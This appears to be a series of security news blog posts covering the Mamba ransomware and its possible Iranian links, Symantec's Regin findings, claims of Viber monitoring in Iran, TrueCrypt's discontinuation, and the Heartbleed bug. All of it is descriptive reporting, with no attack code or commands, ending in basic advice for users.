Are Iranian hackers involved in using the “Mamba” ransomware (or possibly be behind the ransomware)? It seems unclear but an article in November by Brian Krebs indicate there could be a connection.
What is Mamba?
According to Sophos, the Mamba ransomware scrambles every disk sector, including the Master File Table (MFT), the operating system, all applications, files and all personal data. Mamba installs the DiskCryptor Full Disk Encryption (FDE) tool (this type of software asks for a password at bootup, and decrypts every sector as it is read/encrypts every sector as it is written).
The infection vector Mamba uses is not exactly known, but probably uses social engineering in the form of an email link for a user to click on.
If a user does stupidly cause the Mamba ransomware to be downloaded, then on Windows system they would see the user account control (UAC) window appear asking to install MAMBA.EXE (!) What happens next if the software is allowed to install is:
- Mamba installs itself as a Windows service (called DefragmentationService) using the local SYSTEM privileges.
- The computer then reboots.
- After reboot, Mamba then installs DiskCryptor and is located in the directory C:DC22.
- At this stage, the user could recover their computer (the encryption is not complete): using the utility DCRYPT and selecting the Decrypt option, the user can see in plaintext, the file called log_file.txt will contain the password! However, if the user allows the computer to reboot beforehand, then the computer will be encrypted and the user has no way to know the password.
On older Windows system using Master Boot Records (MBR) on the hard drive, you will see something similar to what the Petya ransomware uses; on newer Windows systems, you wont see the message. In both cases, your only option is to wipe your hard drive; all data is gone.
The link with Iran
The blog of Brian Krebs(krebsonsecurity.com) shows that Iranians may have used Mamba against targets, including the San Francisco Municipal Transportation Agency (SFMTA). Fare station terminals displayed the message, “You are Hacked. ALL Data Encrypted.” The messaged showed that the contact for the key to decrypt the computers could be obtained by contacting the email address firstname.lastname@example.org
According to Krebs, the email address of email@example.com was hacked by another hacker, who found the same credentials worked for the crytom2016@yandex email account. A server identified used in association with the user of the cryptom2016 account was used to scan for various vulnerabilities on the Internet, including for Oracle products, especially “Weblogic unserialize exploit” and the Primavera project portfolio management software.
The server used to launch the Oracle vulnerability scans had detailed logs about the date, time and Internet address of each login. A review of the more than 300 Internet addresses used to administer the server revealed that it has been controlled almost exclusively from Internet addresses in Iran.
The attack server logs also included web links or IP addresses of each victim server, listing the hacked credentials and having notes made next to each victim by the attacker. The notes appeared to be transliterated Farsi…
User account names on the attack server held other clues of Iranian involvement, such as names like “Alireza,” “Mokhi.” Alireza may pertain to Ali Reza, the seventh descendant of the prophet Muhammad. However… these are common names in and around Iran and could also indicate surrounding countries of origin (such names is also popular in Turkey and the Arab world).
I would say, knowing what my country is capable of, that the Iranian state or Iranian cyber criminals ARE involved in using Mamba ransomware to extort money to further other cyber activities.
Symantec has revealed details about malware called “Regin”. This shows a multi-stage attack that is capable of being adapted easily to gather different types of data. According to Symantec this is not just screen grabs and password information but something far more sophisticated. Symantec claims that it has identified dozens of different payloads that Regin has access to.
Once Regin has acquired the data it encrypts the data and then exfiltrates it. The stolen data may never be written to disk but may be sent back immediately and the encryption means that security devices and software do not easily detected this.
Symantec describes how Regin uses special features to stay below the detection radar: “These include anti-forensics capabilities, a custom-built encrypted virtual file system (EVFS), and alternative encryption in the form of a variant of RC5, which isn’t commonly used. Regin uses multiple sophisticated means to covertly communicate with the attacker including via ICMP/ping, embedding commands in HTTP cookies, and custom TCP and UDP protocols.”
Regin has been found in 10 countries and the targets seem to be key business sectors, individuals and small businesses. The full list of countries and targets which Symantec gives are:
28% Russian Federation
24% Saudi Arabia
Symantec describes Regin as follows: “In the world of malware threats, only a few examples can truly be considered groundbreaking and almost peerless. What we have seen in Regin is just such a class of malware.”
In September Iran newspaper Khabaronlineclaimed that Viber conversations can be monitored by Iranian government agencies.
In the piece entitled “Are Viber and WhatsApp really monitored easily?” the paper quoted a “computer expert” named Mani Haghshenas who stated: “It is possible for users to use Internet networks that shut down certain security protocols and disallow Viber to encrypt messages, and, ultimately, a network such as Viber would prefer to switch to a normal message transmission mode, in order to avoid permanent nonoperation of its application for some of its users. The country’s filtering systems may sometimes block and disable the security and communication protection capabilities of an application, and in order to continue its operation, such applications may automatically have to provide their services to their users without encryption, and such circumstances would assist the governments to control and tap communications.”
A Viber Company representative refuted these claims and told the International Campaign for Human Rights in Iran that the application communications are encrypted and as such it is not possible for third parties to monitor messages. “All text messages sent through Viber on its supported platforms are encrypted. Media messages, such as photos and videos, are encrypted on Viber for iOS, Viber for Android, Viber for Windows 8 and Viber for Windows Phone 8.”
On one of the official webpages of the popular TrueCrypt encryption program it is written that development has ended suddenly and warns users of the decade-old tool that it isn’t safe to use the tool.
“WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues,” text in red at the top of TrueCrypt page on SourceForge states. The page continues: “This page exists only to help migrate existing data encrypted by TrueCrypt. The development of TrueCrypt was ended in 5/2014 after Microsoft terminated support of Windows XP. Windows 8/7/Vista and later offer integrated support for encrypted disks and virtual disk images. Such integrated support is also available on other platforms. You should migrate any data encrypted by TrueCrypt to encrypted disks or virtual disk images supported on your platform.”
The Heartbleed bug is a serious vulnerability in the popular OpenSSL cryptographic software library and this weakness allows stealing the information protected under normal conditions by the SSL/TLS encryption used to secure the internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (im) and some virtual private networks (VPNs).
The Heartbleed bug allows everyone on the internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and impersonate services and users.
Although OpenSSL is very popular there are other SSL/TLS options. In addition some web sites use an earlier unaffected version and some didn’t enable the heartbeat feature that was central to the vulnerability.
While the implementation of perfect forward secrecy or PFS, a practice that makes sure encryption keys have a very short shelf life, and are not used forever reduces the impact of the potential damage, but it doesn’t solve the problem. That means if an attacker got an encryption key from a server’s memory, the attacker will not be able to decode all secure traffic from that server because keys use is very limited. While some tech giants like Google and Facebook have started to support PFS, not every company supports it.
How to avoid being affected:
Do not log into accounts from afflicted sites until you are sure that the company has patched the problem
When you received confirmation of a security patch, change passwords of sensitive accounts
Monitor your account statements for the next few days in case of any of your accounts was affected